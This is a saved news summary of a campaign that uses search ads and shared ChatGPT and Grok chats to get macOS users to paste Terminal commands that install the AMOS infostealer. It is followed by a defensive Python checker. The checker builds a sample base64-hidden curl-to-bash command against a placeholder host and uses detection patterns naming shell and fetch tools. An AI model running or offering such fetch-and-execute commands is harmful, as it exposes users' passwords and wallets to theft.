Saved February 14, 2026
Do you care about this?
A new campaign exploits Google search ads to direct macOS users to malicious ChatGPT and Grok conversations. These chats contain instructions that, when executed, install the AMOS infostealer malware, compromising sensitive information. Users are advised to be cautious and avoid running unknown commands.
If you do, here's more
A new campaign is using Google search ads to trick macOS users into downloading the AMOS infostealer malware. Cybersecurity researchers from Kaspersky and Huntress discovered that the campaign targets users searching for help with macOS issues, such as maintenance or troubleshooting. By using ads that lead to seemingly helpful ChatGPT and Grok conversations, the attackers provide malicious instructions that, if followed, install the malware on victims' systems.
When a user runs the commands from the AI-generated chat in Terminal, a base64-encoded URL is decoded and yields a bash script that creates a fake password prompt. When the user enters their password, the malware captures it and uses it to download and execute the AMOS infostealer with elevated privileges. This malware, which has been active since April 2023, specifically targets macOS and is rented out for $1,000 a month. Once installed, it looks for cryptocurrency wallets and sensitive data, overwriting legitimate wallet applications with fake versions designed to steal users' seed phrases.
Persistence is maintained through a hidden LaunchDaemon that restarts the malware if it is terminated. The AMOS infostealer not only targets cryptocurrency wallets but also collects a wide range of sensitive information, including browser cookies, passwords, and macOS Keychain data. Researchers emphasize the importance of being cautious with online commands, as even a simple follow-up question about the safety of the instructions can reveal their malicious intent.
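As an added example (not code from the article or from the researchers it cites), the check below reviews a command before it is pasted into Terminal, flagging the two traits described above: a URL that is visible only after base64-decoding, and remote content handed to a shell. The regexes, the 16-character threshold, the function names and the sample commands are all assumptions constructed for illustration; the real campaign's command line is not reproduced on this page.

```python
import base64
import binascii
import re

# Base64 runs long enough to hide a URL (16 chars is an assumed threshold).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"]+")
FETCHER = re.compile(r"\b(?:curl|wget)\b")
# Text handed to a shell: piped into sh/bash/zsh, passed via -c, or eval'd.
SHELL_SINK = re.compile(
    r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b|\beval\b")


def decoded_urls(command):
    """Return URLs that only appear after base64-decoding tokens in command."""
    urls = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 text, e.g. a long file path
        urls.extend(URL.findall(text))
    return urls


def review_command(command):
    """Return findings for a pasted command; an empty list means no check fired."""
    findings = []
    urls = decoded_urls(command)
    if urls:
        findings.append("base64 token decodes to URL: " + ", ".join(urls))
    if SHELL_SINK.search(command) and (urls or FETCHER.search(command)):
        findings.append("remote content is handed to a shell interpreter")
    return findings


# Constructed samples: a reserved .invalid host, not an indicator from the campaign.
HIDDEN_URL = "https://example.invalid/install.sh"
SUSPICIOUS = '/bin/bash -c "$(curl -fsSL $(echo %s | base64 -d))"' % (
    base64.b64encode(HIDDEN_URL.encode()).decode())
BENIGN = "softwareupdate --list"

if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(sample, "->", review_command(sample) or "no findings")
```

An empty result only means these two heuristics did not fire; it is not evidence that a command is safe.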